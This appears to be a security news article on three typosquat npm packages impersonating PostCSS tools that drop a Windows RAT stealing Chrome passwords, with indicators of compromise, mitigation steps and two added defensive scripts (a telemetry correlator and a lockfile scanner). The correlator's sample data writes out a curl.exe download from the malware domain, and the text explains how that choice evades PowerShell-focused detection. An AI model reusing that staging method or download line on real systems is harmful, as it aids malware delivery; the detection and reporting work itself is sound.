PROBABLYPWNED
Malware | June 24, 2026 | 3 min read

npm Typosquat Packages Drop PowerShell RAT Targeting Chrome Creds

Three malicious packages impersonating PostCSS tools deploy a multi-stage Windows RAT. The payload steals saved passwords by bypassing Chrome's app-bound encryption.

James Rivera

Researchers have uncovered three malicious npm packages deploying a sophisticated Windows remote access trojan through a multi-stage infection chain. The packages impersonate PostCSS utilities—one of JavaScript's most foundational build tools with over 150 million weekly downloads.

The campaign targets developers by exploiting the trust placed in familiar package names. Unlike classic typosquatting, which relies on misspellings, these packages use plausible name variations that would pass a casual dependency review.

The Malicious Packages

Security researchers identified three packages published by npm user "abdrizak":

  • postcss-minify-selector-parser (615 downloads)
  • postcss-minify-selector (256 downloads)
  • aes-decode-runner-pro (145 downloads)

The primary attack vector is postcss-minify-selector-parser, which closely mimics the legitimate postcss-selector-parser. The name sounds like it belongs in a PostCSS workflow, making it easy to overlook during code review.

Attack Chain Breakdown

The infection progresses through four distinct stages, each designed to evade detection:

Stage 1: When the package is imported, an embedded JavaScript dropper decrypts a bundled payload with an AES-256-GCM decoder shipped alongside the ciphertext, writes the result to disk as a PowerShell script named settings.ps1, and executes it.

Stage 2: The PowerShell script downloads a ZIP archive from nvidiadriver[.]net, a domain chosen to look like routine driver traffic in network logs. The download is made with curl.exe, which has shipped with Windows since Windows 10 version 1803, rather than with PowerShell's own web cmdlets, so detections keyed on Invoke-WebRequest or System.Net.WebClient do not fire. A process-creation rule for curl.exe spawned by powershell.exe with a URL on its command line still catches it.

Stage 3: The ZIP contains a VBScript file (update.vbs) alongside a bundled Python runtime and compiled extension modules. wscript.exe runs the VBScript, which in turn launches the bundled Python interpreter.

Stage 4: The Python loader (loader.py) imports six compiled extension modules (.pyd files) that make up the RAT's core functionality.
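Because each stage lands in process-creation or network telemetry (Sysmon Event ID 1 and 3, or equivalent EDR data), the chain can be correlated rather than matched one event at a time. The following is an added example, not code from the article or from the malware analysis it summarises: it defines one predicate per stage and alerts when two or more distinct stages fire on the same host inside a time window. The event shape, the assumption that powershell.exe is the parent of wscript.exe, and the sample events are all constructed for this demonstration; the real command lines are not given in the article.

```javascript
// Added example: correlate the four-stage chain over Sysmon-like events.
// Event shape (host, time, image, parentImage, commandLine, destination) and
// the sample events below are constructed assumptions, not data from the article.

const IOC_DOMAIN = 'nvidiadriver.net';
const IOC_C2 = '95.216.92.207:8080';

// Lower-cased file name of an image path; tolerant of missing fields.
function base(path) {
  return path ? path.split(/[\\/]/).pop().toLowerCase() : '';
}

// One predicate per stage. Matching is case-insensitive because Windows
// paths and tooling vary in case across hosts and loggers.
const STAGES = [
  { name: 'stage1-powershell-from-node', // dropper runs inside node and spawns PowerShell
    match: (e) => base(e.image) === 'powershell.exe'
      && (base(e.parentImage) === 'node.exe' || /settings\.ps1/i.test(e.commandLine || '')) },
  { name: 'stage2-curl-from-powershell', // curl.exe, not a PowerShell web cmdlet
    match: (e) => base(e.image) === 'curl.exe' && base(e.parentImage) === 'powershell.exe'
      && (e.commandLine || '').toLowerCase().includes(IOC_DOMAIN) },
  { name: 'stage3-wscript-update-vbs',
    match: (e) => base(e.image) === 'wscript.exe' && /update\.vbs/i.test(e.commandLine || '') },
  { name: 'stage4-python-from-wscript', // bundled interpreter launched by the VBS
    match: (e) => /^pythonw?\.exe$/.test(base(e.image)) && base(e.parentImage) === 'wscript.exe' },
  { name: 'c2-connection',
    match: (e) => e.destination === IOC_C2 },
];

// Group stage hits per host and alert when >= 2 distinct stages occur within
// windowMs of each other. Returns [{ host, stages: [...] }].
function correlate(events, windowMs = 10 * 60 * 1000) {
  const byHost = new Map();
  for (const e of events) {
    for (const s of STAGES) {
      if (!s.match(e)) continue;
      if (!byHost.has(e.host)) byHost.set(e.host, []);
      byHost.get(e.host).push({ stage: s.name, time: Date.parse(e.time) });
    }
  }
  const alerts = [];
  for (const [host, hits] of byHost) {
    hits.sort((a, b) => a.time - b.time);
    for (let i = 0; i < hits.length; i++) {
      const stages = new Set([hits[i].stage]);
      for (let j = i + 1; j < hits.length && hits[j].time - hits[i].time <= windowMs; j++) {
        stages.add(hits[j].stage);
      }
      if (stages.size >= 2) { alerts.push({ host, stages: [...stages].sort() }); break; }
    }
  }
  return alerts;
}

// Constructed sample telemetry: a full infection on dev-01, benign activity on dev-02.
const PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
const TMP = 'C:\\Users\\dev\\AppData\\Local\\Temp\\';
const SAMPLE_EVENTS = [
  { host: 'dev-01', time: '2026-06-20T09:00:00Z', image: 'C:\\Program Files\\nodejs\\node.exe',
    parentImage: 'C:\\Windows\\System32\\cmd.exe', commandLine: 'node build.js', destination: null },
  { host: 'dev-01', time: '2026-06-20T09:00:02Z', image: PS, parentImage: 'C:\\Program Files\\nodejs\\node.exe',
    commandLine: `powershell -File ${TMP}settings.ps1`, destination: null },
  { host: 'dev-01', time: '2026-06-20T09:00:03Z', image: 'C:\\Windows\\System32\\curl.exe', parentImage: PS,
    commandLine: `curl.exe -s -o ${TMP}pkg.zip https://nvidiadriver.net/pkg.zip`, destination: null },
  { host: 'dev-01', time: '2026-06-20T09:00:09Z', image: 'C:\\Windows\\System32\\wscript.exe', parentImage: PS,
    commandLine: `wscript.exe ${TMP}update.vbs`, destination: null },
  { host: 'dev-01', time: '2026-06-20T09:00:10Z', image: `${TMP}python\\python.exe`,
    parentImage: 'C:\\Windows\\System32\\wscript.exe', commandLine: 'python.exe loader.py', destination: null },
  { host: 'dev-01', time: '2026-06-20T09:00:15Z', image: `${TMP}python\\python.exe`,
    parentImage: 'C:\\Windows\\System32\\wscript.exe', commandLine: '', destination: IOC_C2 },
  { host: 'dev-02', time: '2026-06-20T09:05:00Z', image: PS, parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'powershell Get-ChildItem', destination: null },
  { host: 'dev-02', time: '2026-06-20T09:05:01Z', image: 'C:\\Windows\\System32\\curl.exe', parentImage: PS,
    commandLine: 'curl.exe https://example.com', destination: null },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(correlate(SAMPLE_EVENTS), null, 2));
}
```

Run with `node chain-detect.js`; dev-01 produces one alert listing all five stages, while dev-02's ordinary PowerShell-plus-curl activity produces none because no stage predicate matches it. Feed real telemetry by mapping your EDR's fields onto the same event shape.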

RAT Capabilities

The malware's modular architecture reveals its priorities. Six compiled Python extensions handle different operations:

  • config.pyd: Stores C2 server configuration and constants
  • api.pyd: Manages HTTP communications with the command server at 95.216.92[.]207:8080
  • audiodriver.pyd: Orchestrates the main execution loop (the misleading name is intentional)
  • command.pyd: Handles host profiling, VM detection, and file operations
  • auto.pyd: Steals Chrome credentials with app-bound encryption bypass
  • util.pyd: Manages archive creation and handling

The Chrome credential theft module is notable. Google introduced app-bound encryption in Chrome 127, first for cookies and later for saved passwords and payment data, so that the encryption key can only be unwrapped by Chrome itself. This malware includes dedicated routines to bypass that protection, targeting the Local State file (which holds the wrapped key) and the Login Data SQLite database (which holds the saved credentials), combining Windows DPAPI unwrapping with AES-GCM and ChaCha20-Poly1305 decryption. The article does not detail the bypass itself; since the app-bound key is DPAPI-protected under the SYSTEM account as well as the user, unwrapping it normally requires elevation or abuse of Chrome's own elevation service, so finding this routine in a RAT on a developer box is a strong signal that privilege escalation is in play.

Developer Machines Are High-Value Targets

This campaign joins a growing list of supply chain attacks targeting developers. We've covered similar patterns with North Korean packages across multiple ecosystems and AI developer-targeted attacks.

Developer machines are attractive targets because they often contain:

  • Production API keys and secrets in environment variables
  • SSH keys with access to servers and repositories
  • npm tokens that could publish to legitimate packages
  • Access to CI/CD pipelines and deployment infrastructure

A single compromised developer machine can pivot into a much larger breach.

Indicators of Compromise

Malicious packages:

  • postcss-minify-selector-parser
  • postcss-minify-selector
  • aes-decode-runner-pro

C2 server: 95.216.92[.]207:8080

Domain: nvidiadriver[.]net

Files created:

  • settings.ps1 (PowerShell downloader written by the JavaScript dropper)
  • update.vbs (VBScript launcher extracted from the downloaded ZIP)
  • loader.py and the six .pyd modules listed above (extracted from the ZIP)

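The quickest check for the package indicators above is to scan the lockfiles of every project on the machine rather than trust `npm ls` output from a tree that may already be tampered with. The following is an added example, not code from the article or the affected projects: it reads a package-lock.json (v1 nested `dependencies` or v2/v3 `packages`), reports exact matches against the three package names, and additionally flags lookalikes. The lookalike heuristic (a name whose hyphen-separated tokens are a strict superset of a legitimate package's tokens, which is how postcss-minify-selector-parser relates to postcss-selector-parser) and the sample lockfile are assumptions of this example, not something the article describes.

```javascript
// Added example: scan an npm lockfile for the packages named in this article.
// The lookalike heuristic and SAMPLE_LOCKFILE are constructed assumptions.

const MALICIOUS_PACKAGES = new Set([
  'postcss-minify-selector-parser',
  'postcss-minify-selector',
  'aes-decode-runner-pro',
]);

// Legitimate multi-token names worth guarding; extend for your own dependency set.
const LEGITIMATE_TARGETS = ['postcss-selector-parser'];

// Package name from a lockfile v2/v3 "packages" key such as
// "node_modules/postcss" or "node_modules/a/node_modules/@scope/b".
function nameFromPath(key) {
  const m = /node_modules\/((?:@[^/]+\/)?[^/]+)$/.exec(key);
  return m ? m[1] : null;
}

// Every installed package name from v1 (nested "dependencies") and v2/v3 ("packages").
function installedNames(lock) {
  const names = new Set();
  for (const key of Object.keys(lock.packages || {})) {
    const n = nameFromPath(key);
    if (n) names.add(n);
  }
  const walk = (deps) => {
    for (const [n, info] of Object.entries(deps || {})) {
      names.add(n);
      walk(info.dependencies);
    }
  };
  walk(lock.dependencies);
  return names;
}

// Heuristic: tokens of `name` strictly contain all tokens of a legitimate name.
function isLookalike(name) {
  const tokens = new Set(name.split('-'));
  return LEGITIMATE_TARGETS.some((legit) => {
    const lt = legit.split('-');
    return name !== legit && tokens.size > lt.length && lt.every((t) => tokens.has(t));
  });
}

// Returns [{ name, reasons: ['known-malicious' | 'lookalike', ...] }] sorted by name.
function scanLockfile(lock) {
  const findings = [];
  for (const name of installedNames(lock)) {
    const reasons = [];
    if (MALICIOUS_PACKAGES.has(name)) reasons.push('known-malicious');
    if (isLookalike(name)) reasons.push('lookalike');
    if (reasons.length) findings.push({ name, reasons });
  }
  return findings.sort((a, b) => a.name.localeCompare(b.name));
}

// Convenience wrapper for a lockfile on disk.
function scanLockfileAt(path) {
  const fs = require('node:fs');
  return scanLockfile(JSON.parse(fs.readFileSync(path, 'utf8')));
}

// Constructed v3 lockfile: two clean PostCSS packages, one IoC at top level,
// one IoC nested under another dependency. Versions are placeholders.
const SAMPLE_LOCKFILE = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app' },
    'node_modules/postcss': { version: '8.4.0' },
    'node_modules/postcss-selector-parser': { version: '6.0.0' },
    'node_modules/postcss-minify-selector-parser': { version: '1.0.0' },
    'node_modules/some-tool/node_modules/aes-decode-runner-pro': { version: '1.0.0' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const target = process.argv[2] ? scanLockfileAt(process.argv[2]) : scanLockfile(SAMPLE_LOCKFILE);
  console.log(JSON.stringify(target, null, 2));
}
```

Run as `node scan-lock.js path/to/package-lock.json` (or with no argument to scan the embedded sample). Scanning lockfiles rather than node_modules also catches projects that were installed on a CI runner or a colleague's machine from the same lock, which is where a compromised developer credential tends to propagate next.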
Mitigation

Developers who installed any of these packages should immediately:

  1. Uninstall the packages and remove created artifacts
  2. Rotate all credentials stored on the affected machine, including passwords saved in Chrome, SSH keys, and secrets held in environment variables or .env files
  3. Revoke and regenerate npm tokens
  4. Review repository access for unauthorized changes
  5. Check for persistence mechanisms in startup folders, scheduled tasks, and Run registry keys, and remove the bundled Python runtime and .pyd modules dropped by the ZIP

For organizations with security teams, watch for curl.exe spawned by powershell.exe with nvidiadriver[.]net on its command line, DNS lookups for that domain, wscript.exe launching a Python interpreter from a user-writable directory, and any connection to the C2 IP and port. The multi-stage design cuts both ways: blocking any single component, whether the domain, the IP, or script execution from temp directories, breaks the chain.
